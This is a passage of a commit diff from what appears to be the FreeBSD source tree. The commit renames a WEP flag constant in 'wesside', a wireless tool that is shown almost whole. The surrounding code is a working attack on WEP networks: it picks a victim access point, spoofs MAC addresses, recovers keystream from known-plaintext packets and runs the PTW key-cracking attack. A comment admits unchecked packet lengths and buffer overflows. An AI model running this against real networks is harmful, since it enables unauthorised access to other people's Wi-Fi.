"-r\t\n" "-s\t\n" , name); exit(1); } int main(int argc, char *argv[]) { struct params p; char *iface = "wlan0"; char *tap = "tap0"; int ch; memset(&p, 0, sizeof(p)); memcpy(p.mac, "\x00\x00\xde\xfa\xce\xd", 6); p.fname = "prga.log"; p.seq = getpid(); while ((ch = getopt(argc, argv, "hd:p:b:t:r:s:")) != -1) { switch (ch) { case 's': if (!inet_aton(optarg, &p.src)) { printf("Can't parse src IP\n"); exit(1); } break; case 'r': if (str2mac(p.rtr, optarg) == -1) { printf("Can't parse rtr MAC\n"); exit(1); } break; case 't': tap = optarg; break; case 'b': if (str2mac(p.ap, optarg) == -1) { printf("Can't parse BSSID\n"); exit(1); } break; case 'd': if (!inet_aton(optarg, &p.dst)) { printf("Can't parse IP\n"); exit(1); } break; case 'p': p.port = atoi(optarg); break; case 'h': default: usage(argv[0]); break; } } load_prga(&p); assert(p.prga_len > 60); if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); if (connect_buddy(&p) == -1) err(1, "connect_buddy()"); p.state = S_START; while (1) own(&p); exit(0); } diff --git a/tools/tools/net80211/wesside/wesside/wesside.c b/tools/tools/net80211/wesside/wesside/wesside.c index 76f539eeab8a..5d63dc421990 100644 --- a/tools/tools/net80211/wesside/wesside/wesside.c +++ b/tools/tools/net80211/wesside/wesside/wesside.c @@ -1,2814 +1,2815 @@ /* * wep owner by sorbo * Aug 2005 * * XXX GENERAL: I DON'T CHECK FOR PACKET LENGTHS AND STUFF LIKE THAT and buffer * overflows. this whole thing is experimental n e way. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "aircrack-ptw-lib.h" #define FIND_VICTIM 0 #define FOUND_VICTIM 1 #define SENDING_AUTH 2 #define GOT_AUTH 3 #define SPOOF_MAC 4 #define SENDING_ASSOC 5 #define GOT_ASSOC 6 int state = 0; struct timeval arpsend; struct tx_state { int waiting_ack; struct timeval tsent; int retries; unsigned int psent; } txstate; struct chan_info { int s; struct ieee80211req ireq; int chan; } chaninfo; struct victim_info { char* ssid; int chan; char bss[6]; } victim; struct frag_state { struct ieee80211_frame wh; unsigned char* data; int len; unsigned char* ptr; int waiting_relay; struct timeval last; } fragstate; struct prga_info { unsigned char* prga; unsigned int len; unsigned char iv[3]; } prgainfo; struct decrypt_state { unsigned char* cipher; int clen; struct prga_info prgainfo; struct frag_state fragstate; } decryptstate; struct wep_log { unsigned int packets; unsigned int rate; int fd; unsigned char iv[3]; } weplog; #define LINKTYPE_IEEE802_11 105 #define TCPDUMP_MAGIC 0xA1B2C3D4 unsigned char* floodip = 0; unsigned short floodport = 6969; unsigned short floodsport = 53; unsigned char* netip = 0; int netip_arg = 0; int max_chan = 11; unsigned char* rtrmac = 0; unsigned char mymac[] = "\x00\x00\xde\xfa\xce\x0d"; unsigned char myip[16] = "192.168.0.123"; int bits = 0; int ttl_val = 0; PTW_attackstate *ptw; unsigned char *victim_mac = 0; int ack_timeout = 100*1000; #define ARPLEN (8+ 8 + 20) unsigned char arp_clear[] = "\xAA\xAA\x03\x00\x00\x00\x08\x06"; unsigned char ip_clear[] = "\xAA\xAA\x03\x00\x00\x00\x08\x00"; #define S_LLC_SNAP "\xAA\xAA\x03\x00\x00\x00" #define S_LLC_SNAP_ARP (S_LLC_SNAP "\x08\x06") #define S_LLC_SNAP_IP (S_LLC_SNAP "\x08\x00") #define MCAST_PREF "\x01\x00\x5e\x00\x00" #define WEP_FILE "wep.cap" #define KEY_FILE "key.log" #define PRGA_FILE "prga.log" unsigned int min_prga = 128; /* * When starting aircrack we try first to use a * local copy, falling back to where the installed * version is expected. * XXX builtin pathnames */ #define CRACK_LOCAL_CMD "../aircrack/aircrack" #define CRACK_INSTALL_CMD "/usr/local/bin/aircrack" #define INCR 10000 int thresh_incr = INCR; #define MAGIC_TTL_PAD 69 int crack_dur = 60; int wep_thresh = INCR; int crack_pid = 0; struct timeval crack_start; struct timeval real_start; /* linksys does this. The hardware pads small packets. */ #define PADDED_ARPLEN 54 #define PRGA_LEN (1500-14-20-8) unsigned char inet_clear[8+20+8+PRGA_LEN+4]; #define DICT_PATH "dict" #define TAP_DEV "/dev/tap3" unsigned char tapdev[16]; unsigned char taptx[4096]; unsigned int taptx_len = 0; int tapfd = -1; /********** RIPPED ************/ unsigned short in_cksum (unsigned short *ptr, int nbytes) { register long sum; u_short oddbyte; register u_short answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } /************** ************/ unsigned int udp_checksum(unsigned char *stuff, int len, struct in_addr *sip, struct in_addr *dip) { unsigned char *tmp; struct ippseudo *ph; tmp = (unsigned char*) malloc(len + sizeof(struct ippseudo)); if(!tmp) err(1, "malloc()"); ph = (struct ippseudo*) tmp; memcpy(&ph->ippseudo_src, sip, 4); memcpy(&ph->ippseudo_dst, dip, 4); ph->ippseudo_pad = 0; ph->ippseudo_p = IPPROTO_UDP; ph->ippseudo_len = htons(len); memcpy(tmp + sizeof(struct ippseudo), stuff, len); return in_cksum((unsigned short*)tmp, len+sizeof(struct ippseudo)); } void time_print(char* fmt, ...) { va_list ap; char lame[1024]; time_t tt; struct tm *t; va_start(ap, fmt); vsnprintf(lame, sizeof(lame), fmt, ap); va_end(ap); tt = time(NULL); if (tt == (time_t)-1) { perror("time()"); exit(1); } t = localtime(&tt); if (!t) { perror("localtime()"); exit(1); } printf("[%.2d:%.2d:%.2d] %s", t->tm_hour, t->tm_min, t->tm_sec, lame); } void check_key() { char buf[1024]; int fd; int rd; struct timeval now; fd = open(KEY_FILE, O_RDONLY); if (fd == -1) { return; } rd = read(fd, buf, sizeof(buf) -1); if (rd == -1) { perror("read()"); exit(1); } buf[rd] = 0; close(fd); printf ("\n\n"); time_print("KEY=(%s)\n", buf); if (gettimeofday(&now, NULL) == -1) { perror("gettimeofday()"); exit(1); } printf ("Owned in %.02f minutes\n", ((double) now.tv_sec - real_start.tv_sec)/60.0); exit(0); } void kill_crack() { if (crack_pid == 0) return; printf("\n"); time_print("Stopping crack PID=%d\n", crack_pid); // XXX doesn't return -1 for some reason! [maybe on my box... so it // might be buggy on other boxes...] if (kill(crack_pid, SIGINT) == -1) { perror("kill()"); exit(1); } crack_pid = 0; check_key(); } void cleanup(int x) { time_print("\nDying...\n"); if (weplog.fd) close(weplog.fd); kill_crack(); exit(0); } void set_chan(int c) { if (c == chaninfo.chan) return; chaninfo.ireq.i_val = c; if (ioctl(chaninfo.s, SIOCS80211, &chaninfo.ireq) == -1) { perror("ioctl(SIOCS80211) [chan]"); exit(1); } chaninfo.chan = c; } void set_if_mac(unsigned char* mac, unsigned char *name) { int s; struct ifreq ifr; s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { perror("socket()"); exit(1); } memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, name); ifr.ifr_addr.sa_family = AF_LINK; ifr.ifr_addr.sa_len = 6; memcpy(ifr.ifr_addr.sa_data, mac, 6); if (ioctl(s, SIOCSIFLLADDR, &ifr) == -1) { perror("ioctl(SIOCSIFLLADDR)"); exit(1); } close(s); } void setup_if(char *dev) { int s; struct ifreq ifr; unsigned int flags; struct ifmediareq ifmr; int *mwords; if(strlen(dev) >= IFNAMSIZ) { time_print("Interface name too long...\n"); exit(1); } time_print("Setting up %s... ", dev); fflush(stdout); set_if_mac(mymac, dev); s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { perror("socket()"); exit(1); } // set chan memset(&chaninfo.ireq, 0, sizeof(chaninfo.ireq)); strcpy(chaninfo.ireq.i_name, dev); chaninfo.ireq.i_type = IEEE80211_IOC_CHANNEL; chaninfo.chan = 0; chaninfo.s = s; set_chan(1); // set iface up and promisc memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); if (ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCGIFFLAGS)"); exit(1); } flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP | IFF_PPROMISC; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCSIFFLAGS)"); exit(1); } printf("done\n"); } int open_bpf(char *dev, int dlt) { int i; char buf[64]; int fd = -1; struct ifreq ifr; for(i = 0;i < 16; i++) { sprintf(buf, "/dev/bpf%d", i); fd = open(buf, O_RDWR); if(fd < 0) { if(errno != EBUSY) { perror("can't open /dev/bpf"); exit(1); } continue; } else break; } if(fd < 0) { perror("can't open /dev/bpf"); exit(1); } strncpy(ifr.ifr_name, dev, sizeof(ifr.ifr_name)-1); ifr.ifr_name[sizeof(ifr.ifr_name)-1] = 0; if(ioctl(fd, BIOCSETIF, &ifr) < 0) { perror("ioctl(BIOCSETIF)"); exit(1); } if (ioctl(fd, BIOCSDLT, &dlt) < 0) { perror("ioctl(BIOCSDLT)"); exit(1); } i = 1; if(ioctl(fd, BIOCIMMEDIATE, &i) < 0) { perror("ioctl(BIOCIMMEDIATE)"); exit(1); } return fd; } void hexdump(unsigned char *ptr, int len) { while(len > 0) { printf("%.2X ", *ptr); ptr++; len--; } printf("\n"); } char* mac2str(unsigned char* mac) { static char ret[6*3]; sprintf(ret, "%.2X:%.2X:%.2X:%.2X:%.2X:%.2X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); return ret; } void inject(int fd, void *buf, int len) { static struct ieee80211_bpf_params params = { .ibp_vers = IEEE80211_BPF_VERSION, /* NB: no need to pass series 2-4 rate+try */ .ibp_len = sizeof(struct ieee80211_bpf_params) - 6, .ibp_rate0 = 2, /* 1 MB/s XXX */ .ibp_try0 = 1, /* no retransmits */ .ibp_flags = IEEE80211_BPF_NOACK, .ibp_power = 100, /* nominal max */ .ibp_pri = WME_AC_VO, /* high priority */ }; struct iovec iov[2]; int rc; iov[0].iov_base = ¶ms; iov[0].iov_len = params.ibp_len; iov[1].iov_base = buf; iov[1].iov_len = len; rc = writev(fd, iov, 2); if(rc == -1) { perror("writev()"); exit(1); } if (rc != (len + iov[0].iov_len)) { time_print("Error Wrote %d out of %d\n", rc, len+iov[0].iov_len); exit(1); } } void send_frame(int tx, unsigned char* buf, int len) { static unsigned char* lame = 0; static int lamelen = 0; static int lastlen = 0; // retransmit! if (len == -1) { txstate.retries++; if (txstate.retries > 10) { time_print("ERROR Max retransmists for (%d bytes):\n", lastlen); hexdump(&lame[0], lastlen); // exit(1); } len = lastlen; // printf("Warning doing a retransmit...\n"); } // normal tx else { assert(!txstate.waiting_ack); if (len > lamelen) { if (lame) free(lame); lame = (unsigned char*) malloc(len); if(!lame) { perror("malloc()"); exit(1); } lamelen = len; } memcpy(lame, buf, len); txstate.retries = 0; lastlen = len; } inject(tx, lame, len); txstate.waiting_ack = 1; txstate.psent++; if (gettimeofday(&txstate.tsent, NULL) == -1) { perror("gettimeofday()"); exit(1); } #if 0 printf("Wrote frame at %lu.%lu\n", txstate.tsent.tv_sec, txstate.tsent.tv_usec); #endif } unsigned short fnseq(unsigned short fn, unsigned short seq) { unsigned short r = 0; if(fn > 15) { time_print("too many fragments (%d)\n", fn); exit(1); } r = fn; r |= ( (seq % 4096) << IEEE80211_SEQ_SEQ_SHIFT); return r; } void fill_basic(struct ieee80211_frame* wh) { unsigned short* sp; memcpy(wh->i_addr1, victim.bss, 6); memcpy(wh->i_addr2, mymac, 6); memcpy(wh->i_addr3, victim.bss, 6); sp = (unsigned short*) wh->i_seq; *sp = fnseq(0, txstate.psent); sp = (unsigned short*) wh->i_dur; *sp = htole16(32767); } void send_assoc(int tx) { unsigned char buf[128]; struct ieee80211_frame* wh = (struct ieee80211_frame*) buf; unsigned char* body; int ssidlen; memset(buf, 0, sizeof(buf)); fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ASSOC_REQ; body = (unsigned char*) wh + sizeof(*wh); *body = 1 | IEEE80211_CAPINFO_PRIVACY; // cap // cap + interval body += 2 + 2; // ssid *body++ = 0; ssidlen = strlen(victim.ssid); *body++ = ssidlen; memcpy(body, victim.ssid, ssidlen); body += ssidlen; // rates *body++ = 1; *body++ = 4; *body++ = 2; *body++ = 4; *body++ = 11; *body++ = 22; send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2 + strlen(victim.ssid) + 2 + 4); } void wepify(unsigned char* body, int dlen) { uLong crc; unsigned long *pcrc; int i; assert(dlen + 4 <= prgainfo.len); // iv memcpy(body, prgainfo.iv, 3); body +=3; *body++ = 0; // crc crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, body, dlen); pcrc = (unsigned long*) (body+dlen); *pcrc = crc; for (i = 0; i < dlen +4; i++) *body++ ^= prgainfo.prga[i]; } void send_auth(int tx) { unsigned char buf[128]; struct ieee80211_frame* wh = (struct ieee80211_frame*) buf; unsigned short* n; memset(buf, 0, sizeof(buf)); fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH; n = (unsigned short*) ((unsigned char*) wh + sizeof(*wh)); n++; *n = 1; send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2); } int get_victim_ssid(struct ieee80211_frame* wh, int len) { unsigned char* ptr; int x; int gots = 0, gotc = 0; if (len <= sizeof(*wh)) { time_print("Warning: short packet in get_victim_ssid()\n"); return 0; } ptr = (unsigned char*)wh + sizeof(*wh); len -= sizeof(*wh); // only wep baby if ( !(IEEE80211_BEACON_CAPABILITY(ptr) & IEEE80211_CAPINFO_PRIVACY)) { return 0; } // we want a specific victim if (victim_mac) { if (memcmp(wh->i_addr3, victim_mac, 6) != 0) return 0; } // beacon header x = 8 + 2 + 2; if (len <= x) { time_print("Warning short.asdfasdf\n"); return 0; } ptr += x; len -= x; // SSID while(len > 2) { int eid, elen; eid = *ptr; ptr++; elen = *ptr; ptr++; len -= 2; if (len < elen) { time_print("Warning short....\n"); return 0; } // ssid if (eid == 0) { if (victim.ssid) free(victim.ssid); victim.ssid = (char*) malloc(elen + 1); if (!victim.ssid) { perror("malloc()"); exit(1); } memcpy(victim.ssid, ptr, elen); victim.ssid[elen] = 0; gots = 1; } // chan else if(eid == 3) { if( elen != 1) { time_print("Warning len of chan not 1\n"); return 0; } victim.chan = *ptr; gotc = 1; } ptr += elen; len -= elen; } if (gots && gotc) { memcpy(victim.bss, wh->i_addr3, 6); set_chan(victim.chan); state = FOUND_VICTIM; time_print("Found SSID(%s) BSS=(%s) chan=%d\n", victim.ssid, mac2str(victim.bss), victim.chan); return 1; } return 0; } void send_ack(int tx) { /* firmware acks */ } void do_llc(unsigned char* buf, unsigned short type) { struct llc* h = (struct llc*) buf; memset(h, 0, sizeof(*h)); h->llc_dsap = LLC_SNAP_LSAP; h->llc_ssap = LLC_SNAP_LSAP; h->llc_un.type_snap.control = 3; h->llc_un.type_snap.ether_type = htons(type); } void calculate_inet_clear() { struct ip* ih; struct udphdr* uh; uLong crc; unsigned long *pcrc; int dlen; memset(inet_clear, 0, sizeof(inet_clear)); do_llc(inet_clear, ETHERTYPE_IP); ih = (struct ip*) &inet_clear[8]; ih->ip_hl = 5; ih->ip_v = 4; ih->ip_tos = 0; ih->ip_len = htons(20+8+PRGA_LEN); ih->ip_id = htons(666); ih->ip_off = 0; ih->ip_ttl = ttl_val; ih->ip_p = IPPROTO_UDP; ih->ip_sum = 0; inet_aton(floodip, &ih->ip_src); inet_aton(myip, &ih->ip_dst); ih->ip_sum = in_cksum((unsigned short*)ih, 20); uh = (struct udphdr*) ((char*)ih + 20); uh->uh_sport = htons(floodport); uh->uh_dport = htons(floodsport); uh->uh_ulen = htons(8+PRGA_LEN); uh->uh_sum = 0; uh->uh_sum = udp_checksum((unsigned char*)uh, 8+PRGA_LEN, &ih->ip_src, &ih->ip_dst); // crc dlen = 8 + 20 + 8 + PRGA_LEN; assert (dlen + 4 <= sizeof(inet_clear)); crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, inet_clear, dlen); pcrc = (unsigned long*) (inet_clear+dlen); *pcrc = crc; #if 0 printf("INET %d\n", sizeof(inet_clear)); hexdump(inet_clear, sizeof(inet_clear)); #endif } void set_prga(unsigned char* iv, unsigned char* cipher, unsigned char* clear, int len) { int i; int fd; if (prgainfo.len != 0) free(prgainfo.prga); prgainfo.prga = (unsigned char*) malloc(len); if (!prgainfo.prga) { perror("malloc()"); exit(1); } prgainfo.len = len; memcpy(prgainfo.iv, iv, 3); for (i = 0; i < len; i++) { prgainfo.prga[i] = ( cipher ? (clear[i] ^ cipher[i]) : clear[i]); } time_print("Got %d bytes of prga IV=(%.02x:%.02x:%.02x) PRGA=", prgainfo.len, prgainfo.iv[0], prgainfo.iv[1], prgainfo.iv[2]); hexdump(prgainfo.prga, prgainfo.len); if (!cipher) return; fd = open(PRGA_FILE, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); if (fd == -1) { perror("open()"); exit(1); } i = write(fd, prgainfo.iv, 3); if (i == -1) { perror("write()"); exit(1); } if (i != 3) { printf("Wrote %d out of %d\n", i, 3); exit(1); } i = write(fd, prgainfo.prga, prgainfo.len); if (i == -1) { perror("write()"); exit(1); } if (i != prgainfo.len) { printf("Wrote %d out of %d\n", i, prgainfo.len); exit(1); } close(fd); } void log_dictionary(unsigned char* body, int len) { char paths[3][3]; int i, rd; int fd; unsigned char path[128]; unsigned char file_clear[sizeof(inet_clear)]; unsigned char* data; len -= 4; // IV etc.. assert (len == sizeof(inet_clear)); data = body +4; if (len > prgainfo.len) set_prga(body, data, inet_clear, len); for (i = 0; i < 3; i++) snprintf(paths[i], sizeof(paths[i]), "%.2X", body[i]); strcpy(path, DICT_PATH); // first 2 bytes for (i = 0; i < 2; i++) { strcat(path, "/"); strcat(path, paths[i]); fd = open(path, O_RDONLY); if (fd == -1) { if (errno != ENOENT) { perror("open()"); exit(1); } if (mkdir(path, 0755) == -1) { perror("mkdir()"); exit(1); } } else close(fd); } // last byte strcat(path, "/"); strcat(path, paths[2]); fd = open(path, O_RDWR); // already exists... see if we are consistent... if (fd != -1) { rd = read(fd, file_clear, sizeof(file_clear)); if (rd == -1) { perror("read()"); exit(1); } // check consistency.... for (i = 0; i < rd; i++) { if (file_clear[i] != (data[i] ^ inet_clear[i])) { printf("Mismatch in byte %d for:\n", i); hexdump(body, len+4); exit(1); } } // no need to log if (i >= sizeof(inet_clear)) { #if 0 time_print("Not logging IV %.2X:%.2X:%.2X cuz we got it\n", body[0], body[1], body[2]); #endif close(fd); return; } // file has less... fd still open } else { fd = open(path, O_WRONLY | O_CREAT, 0644); if (fd == -1) { printf("Can't open (%s): %s\n", path, strerror(errno)); exit(1); } } assert (sizeof(file_clear) >= sizeof(inet_clear)); for(i = 0; i < len; i++) file_clear[i] = data[i] ^ inet_clear[i]; rd = write(fd, file_clear, len); if (rd == -1) { perror("write()"); exit(1); } if (rd != len) { printf("Wrote %d of %d\n", rd, len); exit(1); } close(fd); } void stuff_for_us(struct ieee80211_frame* wh, int len) { int type,stype; unsigned char* body; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; body = (unsigned char*) wh + sizeof(*wh); // CTL if (type == IEEE80211_FC0_TYPE_CTL) { if (stype == IEEE80211_FC0_SUBTYPE_ACK) { txstate.waiting_ack = 0; return; } if (stype == IEEE80211_FC0_SUBTYPE_RTS) { return; } if (stype == IEEE80211_FC0_SUBTYPE_CTS) { return; } time_print ("got CTL=%x\n", stype); return; } // MGM if (type == IEEE80211_FC0_TYPE_MGT) { if (stype == IEEE80211_FC0_SUBTYPE_DEAUTH) { unsigned short* rc = (unsigned short*) body; printf("\n"); time_print("Got deauth=%u\n", le16toh(*rc)); state = FOUND_VICTIM; return; exit(1); } else if (stype == IEEE80211_FC0_SUBTYPE_AUTH) { unsigned short* sc = (unsigned short*) body; if (*sc != 0) { time_print("Warning got auth algo=%x\n", *sc); exit(1); return; } sc++; if (*sc != 2) { time_print("Warning got auth seq=%x\n", *sc); return; } sc++; if (*sc == 1) { time_print("Auth rejected... trying to spoof mac.\n"); state = SPOOF_MAC; return; } else if (*sc == 0) { time_print("Authenticated\n"); state = GOT_AUTH; return; } else { time_print("Got auth %x\n", *sc); exit(1); } } else if (stype == IEEE80211_FC0_SUBTYPE_ASSOC_RESP) { unsigned short* sc = (unsigned short*) body; sc++; // cap if (*sc == 0) { sc++; unsigned int aid = le16toh(*sc) & 0x3FFF; time_print("Associated (ID=%x)\n", aid); state = GOT_ASSOC; return; } else if (*sc == 12) { time_print("Assoc rejected..." " trying to spoof mac.\n"); state = SPOOF_MAC; return; } else { time_print("got assoc %x\n", *sc); exit(1); } } else if (stype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) { return; } time_print("\nGOT MAN=%x\n", stype); exit(1); } if (type == IEEE80211_FC0_TYPE_DATA && stype == IEEE80211_FC0_SUBTYPE_DATA) { int dlen; dlen = len - sizeof(*wh) - 4 -4; - if (!( wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!( wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { time_print("WARNING: Got NON wep packet from %s dlen %d stype=%x\n", mac2str(wh->i_addr2), dlen, stype); return; } - assert (wh->i_fc[1] & IEEE80211_FC1_WEP); + assert (wh->i_fc[1] & IEEE80211_FC1_PROTECTED); if ((dlen == 36 || dlen == PADDED_ARPLEN) && rtrmac == (unsigned char*) 1) { rtrmac = (unsigned char *) malloc(6); if (!rtrmac) { perror("malloc()"); exit(1); } assert( rtrmac > (unsigned char*) 1); memcpy (rtrmac, wh->i_addr3, 6); time_print("Got arp reply from (%s)\n", mac2str(rtrmac)); return; } #if 0 // check if its a TTL update from dictionary stuff if (dlen >= (8+20+8+MAGIC_TTL_PAD) && dlen <= (8+20+8+MAGIC_TTL_PAD+128)) { int ttl_delta, new_ttl; ttl_delta = dlen - 8 - 20 - 8 - MAGIC_TTL_PAD; new_ttl = 128 - ttl_delta; if (ttl_val && new_ttl != ttl_val) { time_print("oops. ttl changed from %d to %d\n", ttl_val, new_ttl); exit(1); } if (!ttl_val) { ttl_val = new_ttl; printf("\n"); time_print("Got TTL of %d\n", ttl_val); calculate_inet_clear(); } } // check if its dictionary data if (ttl_val && dlen == (8+20+8+PRGA_LEN)) { log_dictionary(body, len - sizeof(*wh)); } #endif } #if 0 printf ("Got frame for us (type=%x stype=%x) from=(%s) len=%d\n", type, stype, mac2str(wh->i_addr2), len); #endif } void decrypt_arpreq(struct ieee80211_frame* wh, int rd) { unsigned char* body; int bodylen; unsigned char clear[36]; unsigned char* ptr; struct arphdr* h; int i; body = (unsigned char*) wh+sizeof(*wh); ptr = clear; // calculate clear-text memcpy(ptr, arp_clear, sizeof(arp_clear)-1); ptr += sizeof(arp_clear) -1; h = (struct arphdr*)ptr; h->ar_hrd = htons(ARPHRD_ETHER); h->ar_pro = htons(ETHERTYPE_IP); h->ar_hln = 6; h->ar_pln = 4; h->ar_op = htons(ARPOP_REQUEST); ptr += sizeof(*h); memcpy(ptr, wh->i_addr3, 6); bodylen = rd - sizeof(*wh) - 4 - 4; decryptstate.clen = bodylen; decryptstate.cipher = (unsigned char*) malloc(decryptstate.clen); if (!decryptstate.cipher) { perror("malloc()"); exit(1); } decryptstate.prgainfo.prga = (unsigned char*) malloc(decryptstate.clen); if (!decryptstate.prgainfo.prga) { perror("malloc()"); exit(1); } memcpy(decryptstate.cipher, &body[4], decryptstate.clen); memcpy(decryptstate.prgainfo.iv, body, 3); memset(decryptstate.prgainfo.prga, 0, decryptstate.clen); for(i = 0; i < (8+8+6); i++) { decryptstate.prgainfo.prga[i] = decryptstate.cipher[i] ^ clear[i]; } decryptstate.prgainfo.len = i; time_print("Got ARP request from (%s)\n", mac2str(wh->i_addr3)); } void log_wep(struct ieee80211_frame* wh, int len) { int rd; struct pcap_pkthdr pkh; struct timeval tv; unsigned char *body = (unsigned char*) (wh+1); memset(&pkh, 0, sizeof(pkh)); pkh.caplen = pkh.len = len; if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); pkh.ts = tv; if (write(weplog.fd, &pkh, sizeof(pkh)) != sizeof(pkh)) err(1, "write()"); rd = write(weplog.fd, wh, len); if (rd == -1) { perror("write()"); exit(1); } if (rd != len) { time_print("short write %d out of %d\n", rd, len); exit(1); } #if 0 if (fsync(weplog.fd) == -1) { perror("fsync()"); exit(1); } #endif memcpy(weplog.iv, body, 3); weplog.packets++; } void try_dictionary(struct ieee80211_frame* wh, int len) { unsigned char *body; char path[52]; char paths[3][3]; int i; int fd, rd; unsigned char packet[4096]; int dlen; struct ether_header* eh; uLong crc; unsigned long *pcrc; unsigned char* dmac, *smac; assert (len < sizeof(packet) + sizeof(*eh)); body = (unsigned char*) wh + sizeof(*wh); for (i = 0; i < 3; i++) snprintf(paths[i], sizeof(paths[i]), "%.2X", body[i]); sprintf(path, "%s/%s/%s/%s", DICT_PATH, paths[0], paths[1], paths[2]); fd = open(path, O_RDONLY); if (fd == -1) return; rd = read(fd, &packet[6], sizeof(packet)-6); if (rd == -1) { perror("read()"); exit(1); } close(fd); dlen = len - sizeof(*wh) - 4; if (dlen > rd) { printf("\n"); time_print("Had PRGA (%s) but too little (%d/%d)\n", path, rd, dlen); return; } body += 4; for (i = 0; i < dlen; i++) packet[6+i] ^= body[i]; dlen -= 4; crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, &packet[6], dlen); pcrc = (unsigned long*) (&packet[6+dlen]); if (*pcrc != crc) { printf("\n"); time_print("HAD PRGA (%s) checksum mismatch! (%x %x)\n", path, *pcrc, crc); return; } // fill ethernet header eh = (struct ether_header*) packet; if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) smac = wh->i_addr3; else smac = wh->i_addr2; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) dmac = wh->i_addr3; else dmac = wh->i_addr1; memcpy(eh->ether_dhost, dmac, 6); memcpy(eh->ether_shost, smac, 6); // ether type should be there from llc dlen -= 8; // llc dlen += sizeof(*eh); #if 0 printf("\n"); time_print("Decrypted packet [%d bytes]!!! w00t\n", dlen); hexdump(packet, dlen); #endif rd = write(tapfd, packet, dlen); if (rd == -1) { perror("write()"); exit(1); } if (rd != dlen) { printf("Wrote %d / %d\n", rd, dlen); exit(1); } } int is_arp(struct ieee80211_frame *wh, int len) { int arpsize = 8 + sizeof(struct arphdr) + 10*2; if (len == arpsize || len == 54) return 1; return 0; } void *get_sa(struct ieee80211_frame *wh) { if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) return wh->i_addr3; else return wh->i_addr2; } void *get_da(struct ieee80211_frame *wh) { if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) return wh->i_addr1; else return wh->i_addr3; } int known_clear(void *clear, struct ieee80211_frame *wh, int len) { unsigned char *ptr = clear; /* IP */ if (!is_arp(wh, len)) { unsigned short iplen = htons(len - 8); // printf("Assuming IP %d\n", len); len = sizeof(S_LLC_SNAP_IP) - 1; memcpy(ptr, S_LLC_SNAP_IP, len); ptr += len; #if 1 len = 2; memcpy(ptr, "\x45\x00", len); ptr += len; memcpy(ptr, &iplen, len); ptr += len; #endif len = ptr - ((unsigned char*)clear); return len; } // printf("Assuming ARP %d\n", len); /* arp */ len = sizeof(S_LLC_SNAP_ARP) - 1; memcpy(ptr, S_LLC_SNAP_ARP, len); ptr += len; /* arp hdr */ len = 6; memcpy(ptr, "\x00\x01\x08\x00\x06\x04", len); ptr += len; /* type of arp */ len = 2; if (memcmp(get_da(wh), "\xff\xff\xff\xff\xff\xff", 6) == 0) memcpy(ptr, "\x00\x01", len); else memcpy(ptr, "\x00\x02", len); ptr += len; /* src mac */ len = 6; memcpy(ptr, get_sa(wh), len); ptr += len; len = ptr - ((unsigned char*)clear); return len; } void add_keystream(struct ieee80211_frame* wh, int rd) { unsigned char clear[1024]; int dlen = rd - sizeof(struct ieee80211_frame) - 4 - 4; int clearsize; unsigned char *body = (unsigned char*) (wh+1); int i; clearsize = known_clear(clear, wh, dlen); if (clearsize < 16) return; for (i = 0; i < 16; i++) clear[i] ^= body[4+i]; PTW_addsession(ptw, body, clear); } void got_wep(struct ieee80211_frame* wh, int rd) { int bodylen; int dlen; unsigned char clear[1024]; int clearsize; unsigned char *body; bodylen = rd - sizeof(struct ieee80211_frame); dlen = bodylen - 4 - 4; body = (unsigned char*) wh + sizeof(*wh); // log it if its stuff not from us... if ( (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) || ( (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) && memcmp(wh->i_addr2, mymac, 6) != 0) ) { if (body[3] != 0) { time_print("Key index=%x!!\n", body[3]); exit(1); } log_wep(wh, rd); add_keystream(wh, rd); // try to decrypt too try_dictionary(wh, rd); } // look for arp-request packets... so we can decrypt em if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr3, mymac, 6) != 0) && (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) && (dlen == 36 || 